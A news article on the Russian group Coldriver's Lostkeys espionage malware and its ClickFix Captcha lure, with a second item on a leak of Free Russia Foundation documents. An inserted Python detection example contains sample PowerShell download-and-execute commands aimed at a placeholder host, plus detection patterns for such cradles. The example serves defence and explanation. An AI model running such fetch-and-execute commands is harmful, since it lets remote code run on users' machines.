Lostkeys Malware: Russian Group Coldriver Targets Western Officials in Espionage Campaign

A new wave of cyber espionage has emerged, with Russian hackers deploying a sophisticated malware strain known as “Lostkeys” to infiltrate the systems of Western officials, journalists, and NGOs. According to researchers from Google’s Threat Intelligence Group, the malware is linked to Coldriver, also known as UNC4057, Star Blizzard, or Callisto—a threat actor believed to be part of Russia’s Federal Security Service (FSB), the successor to the KGB. 

Coldriver has traditionally been involved in phishing operations to steal credentials, but the emergence of Lostkeys demonstrates a significant leap in their cyber capabilities. Lostkeys appears to mark a shift in strategy for the group, moving beyond phishing and into deeper system infiltration. The malware is deployed in a targeted manner, reserved for high-value individuals such as political advisors, think tank members, journalists, and people with known connections to Ukraine.

Activity related to Lostkeys was observed by Google in the early months of 2024—specifically January, March, and April—with evidence suggesting its use might have started as far back as December 2023. The attack begins with a deceptive Captcha page, tricking victims into copying a malicious PowerShell script into the Windows Run dialog. This method, known as “ClickFix,” bypasses typical security filters and exploits user behavior rather than software vulnerabilities. 
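Because ClickFix relies on the victim pasting a command into the Run dialog, the two endpoint artefacts a defender can look at are the resulting process tree (explorer.exe spawning a script interpreter) and the Run dialog's own history in the RunMRU registry key. The triage logic below is an added example, not code from the article or from Google's reporting; the indicator patterns, the sample events and the RunMRU values are all constructed for illustration.

```python
import re

# Constructed Sysmon-style (parent, image, command line) events, not from the article.
SAMPLE_EVENTS = [
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     'powershell -w hidden -nop -c "iwr http://example.invalid/x | iex"'),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\notepad.exe", "notepad.exe"),
    ("C:\\Tools\\Code.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell -File build.ps1"),
]

# Constructed HKCU\...\Explorer\RunMRU values: Windows stores each Run entry as 'command\1'.
SAMPLE_RUNMRU = {
    "a": 'powershell -w hidden -c "irm http://example.invalid/x | iex"\\1',
    "b": "calc\\1",
    "MRUList": "ab",
}

INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")
# Indicator patterns are this example's own choices, not a published signature.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "inline_eval": re.compile(r"\biex\b|invoke-expression", re.I),
}

def indicators_for(cmdline):
    """Names of the suspicious patterns present in a command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]

def triage_process_event(parent, image, cmdline):
    """explorer.exe (the Run dialog's parent) spawning an interpreter with indicators."""
    parent_name = parent.lower().rsplit("\\", 1)[-1]
    image_name = image.lower().rsplit("\\", 1)[-1]
    hits = indicators_for(cmdline)
    if parent_name == "explorer.exe" and image_name in INTERPRETERS and hits:
        return {"verdict": "suspicious", "indicators": hits}
    return {"verdict": "benign", "indicators": hits}

def triage_runmru(values):
    """(value_name, command, indicators) for each suspicious RunMRU entry."""
    findings = []
    for name, raw in values.items():
        cmd = raw.removesuffix("\\1")  # drop the '\1' Windows appends to each entry
        hits = indicators_for(cmd) if name != "MRUList" else []
        if hits:
            findings.append((name, cmd, hits))
    return findings
```

The third sample event shows why the parent check matters: the same interpreter launched by a developer tool with a plain script argument is left alone.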

Once executed, the script connects to a command-and-control server and downloads a series of payloads tailored to each victim. To avoid detection, the malware includes anti-sandbox measures: in the second stage, the script checks the host's screen resolution and halts if it matches the virtual machine environments commonly used by analysts and security researchers. If the device passes this check, the malware proceeds to the final stage, a Visual Basic Script that steals data, including specific file types, system details, and a list of running processes. The stolen data is exfiltrated to the attackers encoded with a two-key substitution cipher whose keys are unique to each infected machine.

Lostkeys appears to be a more refined successor to a previous malware strain known as Spica, which Coldriver also deployed in 2024. While both strains focus on data exfiltration, Lostkeys features a more intricate delivery system and improved obfuscation techniques. Some earlier samples of Lostkeys mimicked legitimate software like Maltego and used executable files instead of PowerShell, though Google has not confirmed if these instances were part of the same campaign or the work of a different threat actor reusing Coldriver’s tactics. 

This development highlights an alarming evolution in state-backed cyber operations, where advanced social engineering and stealth techniques are being increasingly used to infiltrate high-profile targets. As geopolitical tensions persist, the risks posed by such targeted cyber espionage campaigns are expected to grow.

Free Russia Foundation Investigates Potential Cyberattack Amid Leak of Sensitive Documents

One of Russia’s leading pro-democracy groups, the Free Russia Foundation, announced on Friday that it is investigating a potential cyberattack following the online leak of thousands of emails and documents related to its operations.

On Thursday, the Telegram channel SOTA reported that over 2,500 email chains and more than 13GB of electronic documents from the Free Russia Foundation and The US Russia Foundation had been published online.

The Free Russia Foundation stated it is “closely monitoring the illegal dissemination of documents allegedly pertaining to our operations” and has “launched an investigation to determine the origin, full extent, and nature of this breach.”

The foundation suggested that the leak might be connected to recent cyberattacks by the Kremlin-linked hacker group Coldriver, noting, “A number of entities have been compromised, resulting in the theft of their correspondence, including grant reports and internal documents.” The group warned that the attack might be used as “a pretext for a new wave of repression against pro-democracy Russians.”

Additionally, SOTA reported that the personal data of staff members at a facility in Tbilisi, Georgia—known as the “elf factory”—was also leaked. According to independent Russian media outlet The Bell, this facility is where employees are paid to post criticisms of Russian authorities and the war in Ukraine online.

The Free Russia Foundation, a nonprofit established in 2014 by Russians in the United States and currently led by Natalia Arno, aims to promote “a free, democratic, peaceful, and prosperous Russia reintegrated into the international community as a constructive and positive actor.”

In 2019, the Russian Justice Ministry labeled the Free Russia Foundation as an “undesirable organisation” and later, in July, added it to its list of “extremist organisations.”

The foundation commented on the attack, stating, “This attack does not come as a surprise, as everyone who opposes Putin and his system, whether in our team or in other human rights or political opposition organisations, faces risk every day.” Despite the breach, the foundation affirmed its commitment to “stopping the criminal war unleashed by Putin’s regime on Ukraine and to making Russia free and democratic.”